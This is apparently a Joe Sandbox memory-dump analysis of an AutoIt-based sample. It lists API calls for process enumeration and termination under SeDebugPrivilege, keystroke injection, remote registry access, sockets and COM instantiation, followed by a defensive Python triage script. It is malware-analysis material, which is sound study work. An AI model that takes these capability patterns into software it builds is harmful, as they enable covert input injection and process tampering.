                                                                              • Part of subcall function 004F7D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D60
                                                                              • Part of subcall function 004F7D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D6E
                                                                              • Part of subcall function 004F7D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?), ref: 004F7D7E
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00519EF0
                                                                            • _memset.LIBCMT ref: 00519EFD
                                                                            • _memset.LIBCMT ref: 0051A040
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0051A06C
                                                                            • CoTaskMemFree.OLE32(?), ref: 0051A077
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0051A0C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 7f81a0d907ed8a8c19bf373a1f98472b2164bbd60972484e503b2f9c95b26077
                                                                            • Instruction ID: 7829baa0bd4b6987248c8072d0e7bc5914d6c177247b1aa74e6cb59cc4a2781a
                                                                            • Opcode Fuzzy Hash: 7f81a0d907ed8a8c19bf373a1f98472b2164bbd60972484e503b2f9c95b26077
                                                                            • Instruction Fuzzy Hash: 0E914771D00229EBDB11DFA1D895EDEBBB8FF08310F10815AF519A7291DB759A84CFA0
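The per-function "APIs" listings on this page are the raw material for triage, but reading them by hand across hundreds of functions does not scale. As an added example that is not part of the Joe Sandbox report or of the sample's own code, the Python script below parses listings in exactly the form shown here (including the "Part of subcall function" prefix and calls without an argument list, such as _memset.LIBCMT) into structured records, flags capability clusters such as the AttachThreadInput/PostMessageW keystroke-injection routine and the CoInitializeSecurity/CoCreateInstanceEx routine above, and decodes a few constant arguments (window messages, virtual-key codes, CLSCTX flags, COM authentication and impersonation levels, OpenProcess access). The sample input is constructed from lines copied from those two entries; the capability table and all names in the script are my own choices. One caveat a practitioner should keep in mind: the sandbox recovers arguments statically from the pushes preceding each call, so a "?" is a value it could not resolve and a decoded constant indicates likely intent rather than proving what executed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from two function entries on this page
# (the AttachThreadInput/PostMessageW routine and the CoCreateInstanceEx routine).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 004FB52D: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,004FA23B,?,00000001), ref: 004FB54D
  • Part of subcall function 004FB52D: GetCurrentThreadId.KERNEL32 ref: 004FB554
  • Part of subcall function 004FB52D: AttachThreadInput.USER32(00000000,?,004FA23B,?,00000001), ref: 004FB55B
• MapVirtualKeyW.USER32(00000025,00000000,?,00000001), ref: 004FA246
• PostMessageW.USER32(?,00000100,00000025,00000000,?,00000001), ref: 004FA263
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004FA266
• PostMessageW.USER32(?,00000101,00000027,00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA2B0
Memory Dump Source
APIs
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00519EF0
• _memset.LIBCMT ref: 00519EFD
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0051A06C
• CoTaskMemFree.OLE32(?), ref: 0051A077
Strings
• NULL Pointer assignment, xrefs: 0051A0C5
Memory Dump Source
"""

# One "• Api.MODULE(args), ref: ADDR" line; the subcall prefix and the argument list are optional.
LINE_RE = re.compile(r"""^\s*•\s*
    (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]{8}):\s*)?
    (?P<api>\w+)\.(?P<mod>\w+)
    (?:\((?P<args>[^)]*)\))?
    ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""", re.X)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list               # raw argument strings; "?" means the sandbox could not resolve the value
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line came from a "Part of subcall function" entry


def parse_functions(text):
    """Split report text into per-function ApiCall lists: "APIs" opens a list, "Strings"/"Memory Dump Source" closes it."""
    funcs, current = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            current = []
            funcs.append(current)
        elif s in ("Strings", "Memory Dump Source"):
            current = None
        elif current is not None and (m := LINE_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                   int(m["sub"], 16) if m["sub"] else None))
    return funcs


# Capability clusters (my own table): every API in the set must appear in one function, directly or via a subcall.
CAPABILITIES = {
    "keystroke injection (AttachThreadInput + PostMessageW)": {"AttachThreadInput", "PostMessageW"},
    "COM object instantiation": {"CoInitializeSecurity", "CoCreateInstanceEx"},
    "process enumeration and termination": {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"},
    "thread creation with duplicated handles": {"DuplicateHandle", "CreateThread"},
}
WM = {0x80: "WM_SETICON", 0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}
CLSCTX = [(0x1, "CLSCTX_INPROC_SERVER"), (0x2, "CLSCTX_INPROC_HANDLER"),
          (0x4, "CLSCTX_LOCAL_SERVER"), (0x10, "CLSCTX_REMOTE_SERVER")]
AUTHN = {0: "DEFAULT", 1: "NONE", 2: "CONNECT", 3: "CALL", 4: "PKT", 5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
IMP = {0: "DEFAULT", 1: "ANONYMOUS", 2: "IDENTIFY", 3: "IMPERSONATE", 4: "DELEGATE"}


def _const(arg):
    """Hex argument -> int; None for '?' or a non-numeric value such as a string literal."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode(call):
    """Best-effort symbolic decode of constant arguments for a few APIs of interest; None if nothing to say."""
    a = call.args
    if call.api == "PostMessageW" and len(a) >= 3:
        msg, wparam = _const(a[1]), _const(a[2])
        if msg is None:
            return None
        text = WM.get(msg, f"WM_0x{msg:X}")
        if msg in (0x100, 0x101) and wparam is not None:      # key messages carry the virtual-key code in wParam
            text += " " + VK.get(wparam, f"VK_0x{wparam:X}")
        return text
    if call.api == "CoCreateInstanceEx" and len(a) >= 3 and (ctx := _const(a[2])) is not None:
        return "|".join(name for bit, name in CLSCTX if ctx & bit)
    if call.api == "CoInitializeSecurity" and len(a) >= 6:
        authn, imp = _const(a[4]), _const(a[5])              # dwAuthnLevel, dwImpLevel
        if authn is not None and imp is not None:
            return f"RPC_C_AUTHN_LEVEL_{AUTHN.get(authn, authn)}, RPC_C_IMP_LEVEL_{IMP.get(imp, imp)}"
    if call.api == "OpenProcess" and a and (access := _const(a[0])) is not None:
        return "PROCESS_TERMINATE" if access == 0x1 else f"access=0x{access:X}"
    return None


def triage(text):
    """One summary per function: APIs seen, capability clusters matched, decoded constants with call-site address."""
    out = []
    for calls in parse_functions(text):
        apis = {c.api for c in calls}
        out.append({
            "apis": sorted(apis),
            "capabilities": [name for name, need in CAPABILITIES.items() if need <= apis],
            "decoded": [(c.api, f"{c.ref:08X}", d) for c in calls if (d := decode(c)) is not None],
        })
    return out


if __name__ == "__main__":
    for i, f in enumerate(triage(SAMPLE_REPORT)):
        print(f"function {i}: {f['capabilities']}")
        for api, ref, d in f["decoded"]:
            print(f"  {api} @ {ref}: {d}")
```

Run against the two entries, the first function is flagged for keystroke injection with WM_KEYDOWN VK_LEFT and WM_KEYUP VK_RIGHT decoded from the PostMessageW arguments, and the second for COM instantiation with the CoCreateInstanceEx context decoded as CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER. To apply it to the whole report, feed the extracted page text to triage() and sort functions by the number of clusters hit; the capability table is deliberately small and should be extended with the clusters that matter for the case at hand.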
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010,?,?,SysListView32,00530980,00000000,?,?,?,?,?,?,00000000), ref: 00527449
                                                                            • SendMessageW.USER32(?,00001036,00000000,?,?,?,SysListView32,00530980,00000000,?,?,?,?,?,?,00000000), ref: 0052745D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00527477
                                                                            • _wcscat.LIBCMT ref: 005274D2
                                                                            • SendMessageW.USER32(?,00001057,00000000,?,?,?,005677C4), ref: 005274E9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00527517
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 893b30f0a3369b0d77d9fa90441cc3528a1196aed71c9d43f06758a4d2f7c23e
                                                                            • Instruction ID: fbea105d1b499c44f3848daba75a6db9e24392833ca1addcf6d87dc3620f436a
                                                                            • Opcode Fuzzy Hash: 893b30f0a3369b0d77d9fa90441cc3528a1196aed71c9d43f06758a4d2f7c23e
                                                                            • Instruction Fuzzy Hash: FA419F71A04318AFEB21DF64DC85BEEBBA8FF09354F10442AF984A72D1D6B19D849B50
                                                                            APIs
                                                                              • Part of subcall function 00504148: CreateToolhelp32Snapshot.KERNEL32 ref: 0050416D
                                                                              • Part of subcall function 00504148: Process32FirstW.KERNEL32(00000000,?), ref: 0050417B
                                                                              • Part of subcall function 00504148: CloseHandle.KERNEL32(00000000), ref: 00504245
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051F08D
                                                                            • GetLastError.KERNEL32 ref: 0051F0A0
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051F0CF
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0051F14C
                                                                            • GetLastError.KERNEL32(00000000), ref: 0051F157
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0051F18C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: ea2681aaea18d749cd7e7354d8d2014871b11c3519bc4951e81a1c4b5347eb82
                                                                            • Instruction ID: 3532ada3525da0849ed8c1fa742e289c773e6250c3cb9c2a8e033e372e43e9b1
                                                                            • Opcode Fuzzy Hash: ea2681aaea18d749cd7e7354d8d2014871b11c3519bc4951e81a1c4b5347eb82
                                                                            • Instruction Fuzzy Hash: 5341B131240301AFD711EF25CC95FADBBA5AF94718F04841DF9465B3D2CBB8A848CB99
                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104,00567A2C,00567890), ref: 004F0C5B
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • _memset.LIBCMT ref: 004B5787
                                                                            • _wcscpy.LIBCMT ref: 004B57DB
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 004B57EB
                                                                            • __swprintf.LIBCMT ref: 004F0CD1
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                            • String ID: Line %d: $AutoIt -
                                                                            • API String ID: 230667853-4094128768
                                                                            • Opcode ID: bd1e2fc3ab1ce7b67d3d2f9582ad9139cc801039c5dba51d9abcf4bc7877c7c0
                                                                            • Instruction ID: a58157c977bfa3a52b2f1ed9839fabc2283057b57ebac0e5adb51e993ac9afab
                                                                            • Opcode Fuzzy Hash: bd1e2fc3ab1ce7b67d3d2f9582ad9139cc801039c5dba51d9abcf4bc7877c7c0
                                                                            • Instruction Fuzzy Hash: D241D371008304AAD321EB64DCA5FEF77ECAF94358F40061FF185921A2DF789649C7AA
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00504802
                                                                            • LoadStringW.USER32(00000000), ref: 00504809
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0050481F
                                                                            • LoadStringW.USER32(00000000), ref: 00504826
                                                                            • _wprintf.LIBCMT ref: 0050484C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0050486A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00504847
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 6f2d3ff46684a76b1a034a46c6141c3d4ecd2b88752a6a7b12a9530960a5cf3b
                                                                            • Instruction ID: c801f5983cb9a02a95fb35ed9226a065fe4d9e7079e7309df9fc32f572cd85cd
                                                                            • Opcode Fuzzy Hash: 6f2d3ff46684a76b1a034a46c6141c3d4ecd2b88752a6a7b12a9530960a5cf3b
                                                                            • Instruction Fuzzy Hash: 7F01A7F28003087FE711A7909D99EF7776CEB08301F400595B709E2181E7349E888B74
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0052DB42
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0052DB62
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0052DD9D
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0052DDBB
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0052DDDC
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 0052DDFB
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0052DE20
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0052DE43
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: 338976fa95bb169df5c4ef85d240efe255b4cb5096833115381d22fd23cf083a
                                                                            • Instruction ID: e9951b157e4e1e87b0ecb176235bb5291105e046003946486729cb05d5f1d91a
                                                                            • Opcode Fuzzy Hash: 338976fa95bb169df5c4ef85d240efe255b4cb5096833115381d22fd23cf083a
                                                                            • Instruction Fuzzy Hash: 86B19831600229ABDF14CF69D9897AE7BB1FF45701F098069EC48AF295D770A950CBA0
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 0052147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0052040D,?,?), ref: 00521491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0052044E
                                                                            Similarity
                                                                            • API ID: BuffCharConnectRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3479070676-0
                                                                            • Opcode ID: 0f7e24e36ca40a3b73c95bc17f835b28aee4a2763490b03318cd3ac65de2bb26
                                                                            • Instruction ID: a09e9484cd8ee094440796b23f6eaec410e8e846207eda17950eac8838ab32dd
                                                                            • Opcode Fuzzy Hash: 0f7e24e36ca40a3b73c95bc17f835b28aee4a2763490b03318cd3ac65de2bb26
                                                                            • Instruction Fuzzy Hash: CBA19A302042119FCB14EF25D895B6EBBE5BF85318F04881EF5968B2E2DB39E945CF46
                                                                            APIs
                                                                            • ShowWindow.USER32(?,?,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000), ref: 004A2E9F
                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000,000000FF), ref: 004A2EE7
                                                                            • ShowWindow.USER32(?,00000006,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000), ref: 004DC55B
                                                                            • ShowWindow.USER32(?,?,00000000,00000000,?,004DC508,00000004,00000000,00000000,00000000), ref: 004DC5C7
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: a55e20193b12c40e5220d6ff80b3d6a838a9d7c23f40ad226ecb89d21ee171ed
                                                                            • Instruction ID: f7ab68529219856b3cadbdfd9b81c98ce2ca39ee9835382a589ee07caf4153fd
                                                                            • Opcode Fuzzy Hash: a55e20193b12c40e5220d6ff80b3d6a838a9d7c23f40ad226ecb89d21ee171ed
                                                                            • Instruction Fuzzy Hash: D241C930604781AAC735472D9AE876B7B92ABB7300F14840FE447477A1C6BDA9C5F719
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00507698
                                                                              • Part of subcall function 004C0FE6: std::exception::exception.LIBCMT ref: 004C101C
                                                                              • Part of subcall function 004C0FE6: __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005076CF
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 005076EB
                                                                            • _memmove.LIBCMT ref: 00507739
                                                                            • _memmove.LIBCMT ref: 00507756
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00507765
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0050777A
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00507799
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: 43c1b8ffb6786d42e6ea34d836dc9e081b16881ddcb3b6066c44ee5edeec3614
                                                                            • Instruction ID: 952c82caf2fb463917db920443ef0325f5bf7415be7688eef29995b38b3006ff
                                                                            • Opcode Fuzzy Hash: 43c1b8ffb6786d42e6ea34d836dc9e081b16881ddcb3b6066c44ee5edeec3614
                                                                            • Instruction Fuzzy Hash: 6931AF35904208EBCB50EF65DC85E6FBB78FF45304B1440AAF904AB296D770EE54DBA4
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000,00000001,?,?,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00526810
                                                                            • GetDC.USER32(00000000,00000001,?,?,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00526818
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00526823
                                                                            • ReleaseDC.USER32(00000000,00000000,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 0052682F
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0052686B
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 0052687C
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?), ref: 005268B6
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000,?,?,0052964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 005268D6
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            APIs
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                            • _wcstok.LIBCMT ref: 0050F2D7
                                                                            • _wcscpy.LIBCMT ref: 0050F366
                                                                            • _memset.LIBCMT ref: 0050F399
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                            • String ID: X
                                                                            • API String ID: 774024439-3081909835
                                                                            APIs
                                                                            • #151.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005172EB
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0051730C
                                                                            • #111.WSOCK32(00000000), ref: 0051731F
                                                                            • #15.WSOCK32(?,?,?,00000000,?), ref: 005173D5
                                                                            • #11.WSOCK32(?), ref: 00517392
                                                                              • Part of subcall function 004FB4EA: _strlen.LIBCMT ref: 004FB4F4
                                                                              • Part of subcall function 004FB4EA: _memmove.LIBCMT ref: 004FB516
                                                                            • _strlen.LIBCMT ref: 0051742F
                                                                            • _memmove.LIBCMT ref: 00517498
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$#111#151
                                                                            • String ID:
                                                                            • API String ID: 2620998920-0
                                                                            APIs
                                                                            • IsWindow.USER32(?), ref: 0052BA5D
                                                                            • IsWindowEnabled.USER32(?), ref: 0052BA69
                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000,?,?,?,?,?,00000000), ref: 0052BB4D
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0052BB84
                                                                            • IsDlgButtonChecked.USER32(?,?,?,?), ref: 0052BBC1
                                                                            • GetWindowLongW.USER32(?,000000EC,?,?,?), ref: 0052BBE3
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0052BBFB
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0051FB31
                                                                            • _memset.LIBCMT ref: 0051FBFA
                                                                            • ShellExecuteExW.SHELL32(?), ref: 0051FC3F
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                            • GetProcessId.KERNEL32(00000000), ref: 0051FCB6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0051FCE5
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            APIs
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,004AAB12), ref: 004C07EC
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(00000010,00000000,?,?,?,004AAB12), ref: 004C07F4
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,004AAB12), ref: 004C07FF
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,004AAB12), ref: 004C080A
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(00000011,00000000,?,?,?,004AAB12), ref: 004C0812
                                                                              • Part of subcall function 004C07BB: MapVirtualKeyW.USER32(00000012,00000000,?,?,?,004AAB12), ref: 004C081A
                                                                              • Part of subcall function 004BFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004AAC6B), ref: 004BFFA7
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004AAD08
                                                                            • OleInitialize.OLE32(00000000), ref: 004AAD85
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004E2F56
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID: <wV$\tV$sV
                                                                            • API String ID: 1986988660-3499476272
                                                                            APIs
                                                                            • GetParent.USER32(?,?,?,00000011), ref: 0050178B
                                                                            • GetKeyboardState.USER32(?), ref: 005017A0
                                                                            • SetKeyboardState.USER32(?), ref: 00501801
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0050182F
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0050184E
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00501894
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005018B7
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            APIs
                                                                            • GetParent.USER32(00000000,00000000,00000000), ref: 005015A4
                                                                            • GetKeyboardState.USER32(?), ref: 005015B9
                                                                            • SetKeyboardState.USER32(?), ref: 0050161A
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00501646
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00501663
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005016A7
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005016C8
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
APIs
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
APIs
  • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00503B8A,?), ref: 00504BE0
  • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00503B8A,?), ref: 00504BF9
• lstrcmpiW.KERNEL32(?,?), ref: 00503BAA
• _wcscmp.LIBCMT ref: 00503BC6
• MoveFileW.KERNEL32(?,?), ref: 00503BDE
• _wcscat.LIBCMT ref: 00503C26
• SHFileOperationW.SHELL32(?), ref: 00503C92
Strings
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
APIs
• _memset.LIBCMT ref: 005278CF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00527976
• IsMenu.USER32(?), ref: 0052798E
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005279D6
• DrawMenuBar.USER32 ref: 005279E9
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00521631
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0052165B
• FreeLibrary.KERNEL32(00000000), ref: 00521712
  • Part of subcall function 00521602: RegCloseKey.ADVAPI32(?), ref: 00521678
  • Part of subcall function 00521602: FreeLibrary.KERNEL32(?), ref: 005216CA
